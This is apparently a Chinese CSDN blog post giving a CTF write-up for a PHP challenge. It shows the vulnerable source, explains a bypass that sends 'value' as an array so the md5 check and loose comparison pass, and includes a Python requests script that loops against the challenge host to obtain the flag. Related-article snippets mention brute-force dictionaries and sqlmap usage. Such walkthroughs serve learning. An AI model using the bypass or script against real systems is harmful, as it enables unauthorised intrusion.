php(四)爆破

最新推荐文章于 2023-02-27 23:32:49 发布
最新推荐文章于 2023-02-27 23:32:49 发布
阅读量853 收藏
点赞数 1
分类专栏: php CTF 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tutu123456789101112/article/details/88191920
版权
学习 同时被 3 个专栏收录
8 篇文章 0 订阅
订阅专栏
php
6 篇文章 0 订阅
订阅专栏
CTF
3 篇文章 0 订阅
订阅专栏 
<?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');//确定范围
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];//随机产生26个字母中的一个

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

构造函数 爆破:/?value[0]=e&value[1]=a,然后把随机爆出的字母输入十次。爆出flag
substr(md5($value),5,4)拆解:md5($value)恒为零。

------------------------------2019年3月20日尝试增加脚本破解----------------------------
python3 脚本

import requests
 
s = requests.session() //创建一个session对象 。
 
strs = ['abcdefghijklmnopqrstuvwxyz'] //设置字符串库a-z。
 
url = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=ea" //确定url
r = s.get(url)  //获取url中以get方式上传的参数
 
for i in range(10):
    url_1 = "http://b9998c89f8054c61b75dcf6d48d1d164707c9299b7f949f4.game.ichunqiu.com/?value[]=" + r.text[:2] //获取头两个字母
    r = s.get(url_1)
    print(r.url)
    if 'flag{' in r.text://如果是‘flag{’输出text的值
        print(r.text)
菊之狗剩
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
字典爆破php,【爆破大法】百站爆破经验总结(附带各种爆破字典)
weixin_35070219的博客
03-11 4318
原标题:【爆破大法】百站爆破经验总结(附带各种爆破字典) 近来10多天一直在学习爆破大法,下面是我为大家献上的百战爆破总结。1.字典大法好又好(1).明文Top1400+:用户名 密码1000合成.zip该套字典是集合了TOP100用户名+TOP1000密码。下载链接:http://www.chinacycc.com/forum.php?mod=attachment&aid=NTgyOXw...
半自动化的注入爆破工具(PHP版)
03-27
此工具适用于不能使用UNION SELECT的情况,通过自己构造语句,可以爆出任何想要的数据. 由于不能做到多线程,并且受制于PHP的max_execution_time最大为30秒, 因此在网络不给力的情况下无法爆出所有想要的字符. 此时可以通过指定少数字符来逐段爆破. 另外, 目前只支持 and (select .... ) >={guess} 或者 and {guess}<=(select ...) 的情形.
php _findfirst,windows的文件系统机制引发的PHP路径爆破问题分析
weixin_39539733的博客
03-10 123
1.开场白for ($i=0; $i<255; $i++) {$url = '1.ph' . chr($i);$tmp = @file_get_contents($url);if (!empty($tmp)) echo chr($i) . "\r\n";}?>已知1.php存在,以上脚本访问的结果是:1.php1.phP1.ph<1.ph>都能得到返回。前两种能返回结果是总...
php路径爆破,当Windows遇上PHP–路径爆破
weixin_39853131的博客
04-09 164
1.开场白此次所披露的是以下网页中提出的问题所取得的测试结果:http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
php路径爆破,当Windows遇上PHP–路径爆破 | CN-SEC 中文网
weixin_29648175的博客
04-09 224
摘要1.开场白 此次所披露的是以下网页中提出的问题所取得的测试结果: http://code.google.com/p/pasc2at/wiki/SimplifiedChinese1.开场白此次所披露的是以下网页中提出的问题所取得的测试结果:已知1.php存在,以上脚本访问的结果是:1.php1.phP1.ph<1.ph>都能得到返回。前两种能返回结果是总所周知的(因为wind...
PHP代码审计入门--爆破token脚本学习
身高两米不到的博客
02-27 399
从零学习php,最终目的实现代码审计入门,软件采用sublime text,环境使用phpstudy搭建,数据库是navicat,需要有基本的前端基础、简单的php+mysql后端基础、渗透知识和漏洞原理,看看曾经遥不可及的代码审计能不能慢慢啃下来。代码实例展示,唯一需要注意的是如果是证书是从0开始数的,也就是说下面的a是第0位,b才是第一位。本章为代码审计入门第十篇,学习有关爆破token的md5值。这段时间忙于其它事情,没有写博客,现在回归正轨。满足条件的参数遍历出来了。
windows的文件系统机制引发的PHP路径爆破问题分析
10-25
主要介绍了windows的文件系统机制引发的PHP路径爆破问题分析,需要的朋友可以参考下
phpadmin及php爆破路径收集字典
07-13
phpadmin及php爆破路径收集字典,网络安全,字典,软件
PHP版Mysql爆破小脚本
09-09
本文给大家分享的是使用php实现暴力破解mysql的小脚本代码,非常的好用,有需要的小伙伴可以参考下
phpmyadmin及php爆路径字典
11-04
phpmyadmin后台,后台管理路径爆破,以及,php常用路径爆破字典
ftp爆破工具
07-25
支持多线程, 自定义字典, 下载时建议关掉查杀工具 Usage: ftpscan [Thread] Example: ftpscan 10.0.0.1-10.0.0.254 200
kali攻防第7章 SQLMAP介绍之PHP网站渗透
安全参透之旅
12-01 3623
SQLMAP介绍之PHP网站渗透   准备工具   1、KALI攻击系统IP :10.10.10.131 2、受害网站: 3、Sqlmap 入注工具     步骤: 1、检测:Sqlmap -u “” 2、sqlmap -u "" --is-dba 3、sqlmap -u “”  --dbs 4、sqlmap -u “”  --current-db 5、sqlmap -
php文件防止爆破,windows的文件系统机制引发的PHP路径爆破问题分析
weixin_35182991的博客
03-10 112
1.开场白已知1.php存在,以上脚本访问的结果是:1.php1.phP1.ph<1.ph>都能得到返回。前两种能返回结果是总所周知的(因为windows的文件系统支持大小的互转的机制),另外的两种返回引起了我们的注意。测试php版本:PHP4.9,PHP5.2,PHP5.3,PHP6.0测试系统:WINXP SP3 X32,WINXP SP2 X64,WIN7,WIN2K3经测试我们...
PHP+MySQL+JavaScript实现注册登录(防黑客爆破
Coisini的博客
06-03 1336
注册界面html前端 <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title></title> </head> <body> 注册界面 <form action="./login.php" method="pos...
PHP版CMS爆破工具
weixin_34127717的博客
11-04 154
当你觉得传统信息安全手段都用完了的时候,你是否想过还有暴力破解啊。现在一般的大型网站都是dz论坛跟wp博客,没有0DAY在手怎么办啊,你忘了一句话叫做不怕神一样的对手只怕猪一样的队友啊,结合非传统的社工工程学收集信息,制作字典,最后进行fuzz。没事写了个PHP版的fuzz,只写了dz跟wp的模块,有兴趣的朋友自己添加其他模块。有好的常用弱口令的同学麻烦在此帖共享下。另外没有...
【Web安全】Session防爆破的实现
余轩轩轩轩啊的博客
01-29 1131
前置内容:什么是Session爆破 (请参考 http://www.cnblogs.com/phpstudy2015-6/p/6776919.html ) session爆破的基本流程如下图所示: 本文将解决攻击者在第3步中使用暴力破解的方式获取合法的session: 实现思路: 攻击者通过携带不同的session向服务端发送请求以达到获取合法回话。因此可以为服务器端增加一个过滤器来判断某...
简单程序实现防爆破登录系统流程,通过控制特定时间段内错误密码输入次数实现
suxianjunaa的博客
02-11 1852
1、数据库设计时,用特定的数据库表存储当前账号登录密码错误输入的次数和锁定时的时间; 2、登录过程中,在密码验证之前查询当前登录账号是否锁定: 未锁定时验证密码是否正确:  密码正确情况下作正常登录处理; 密码错误情况下记录当前登录账号密码错误记录,查询当前账号登录的错误次数,是否达到累计次数:a. 达到时,记录当前时间为锁定时间;b.未达到,给出密码错误提示,重新登录。 锁定情况下查询当前...
第一次php代码审计
h3110n3w0r1d
04-05 916
1.源代码 <?php require_once('flag.php'); error_reporting(0); if(!isset($_GET['msg'])){ highlight_file(__FILE__); die(); } @$msg = $_GET['msg']; if(@file_get_contents($msg)!=="Hello Chal...
2021 CNSS招新赛 WEB WP
Sapphire037的博客
11-04 1273
Web Signin 一开始提示Please Change Your Method!,抓包修改为POST方法即可得到源码 <?php error_reporting(0); require_once("flag.php"); if($_SERVER['REQUEST_METHOD'] !=='POST'){ die("Please Change Your Method!"); exit(); }else{ if(!isset($_POST["CNSS"])){
sqlmap爆破目录
最新发布
11-23
它可以通过爆破数据库和表来获取目标网站的敏感信息。下面是使用sqlmap爆破目录的步骤: 1.使用以下命令扫描目标网站,查找是否存在SQL注入漏洞: ```shell sqlmap -u ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值